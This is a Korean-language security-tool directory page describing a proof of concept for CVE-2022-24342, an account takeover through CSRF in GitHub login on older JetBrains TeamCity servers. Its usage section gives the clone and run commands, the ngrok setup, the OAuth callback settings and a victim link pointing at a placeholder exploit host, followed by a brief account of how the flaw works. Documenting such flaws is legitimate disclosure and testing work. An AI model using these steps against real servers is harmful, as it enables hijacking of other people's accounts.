Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-24342 — PoC for CVE-2022-24342: account takeover via CSRF in GitHub authentication | Kitploit
도구/GitHubGitHub/yuriisanin/cve-2022-24342
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubyuriisanin/cve-2022-24342

CVE-2022-24342

PoC for CVE-2022-24342: account takeover via CSRF in GitHub authentication

저장소 보기
3774년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-24342

JetBrains TeamCity - GitHub 인증의 CSRF를 통한 계정 탈취 (PoC)

  • CVE-2022-24342
    • 요구 사항
    • 사용법
    • 작동 방식
      • GitHub OAuth2: 쿼리 파라미터 처리 순서
      • CVE-2022-24342: HTTP 요청 흐름

요구 사항

  • JetBrains TeamCity <2021.2.1
  • GitHub 인증이 활성화되어 있어야 함

사용법

  1. 공격자의 GitHub 계정으로 대상 TeamCity 인스턴스에 로그인을 시도하여 TeamCity의 GitHub 애플리케이션을 인증 상태로 만듭니다.

  2. 다음을 설치 및 실행합니다:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  show this help message and exit
  -s S        GitHub user session
  -p P        Uvicorn port

$ python3 exploit.py -s {attackers_github_session_cookie}

로컬 머신에서 익스플로잇을 실행하는 경우 Ngrok이나 대체 도구가 필요할 수 있습니다.

root@kitploit:~
$ ngrok http 8000
  1. GitHub OAuth2 애플리케이션을 생성합니다:
root@kitploit:~
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
  1. 피해자에게 다음 링크를 보냅니다:
root@kitploit:~
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}

데모:

CVE-2022-24342 Demo

작동 방식

TeamCity는 OAuth2 흐름 중 쿼리 파라미터 주입 취약점이 발생하여, 공격자가 사용자를 임의의 GitHub OAuth2 애플리케이션으로 리디렉션하고, 유효한 state 파라미터를 가로채, 피해자의 TeamCity 계정에 임의의 GitHub 계정을 연결할 수 있었습니다.

이는 다음 요소들 덕분에 가능했습니다:

  • GitHub OAuth2 쿼리 파라미터 처리 순서
  • TeamCity 쿼리 파라미터 주입

GitHub OAuth2: 쿼리 파라미터 처리 순서

github-oauth-parameters-processing

CVE-2022-24342: HTTP 요청 흐름

requests-flow

지원

Twitter, GitHub 또는 YouTube에서 저를 팔로우하실 수 있습니다.

도구 다운로드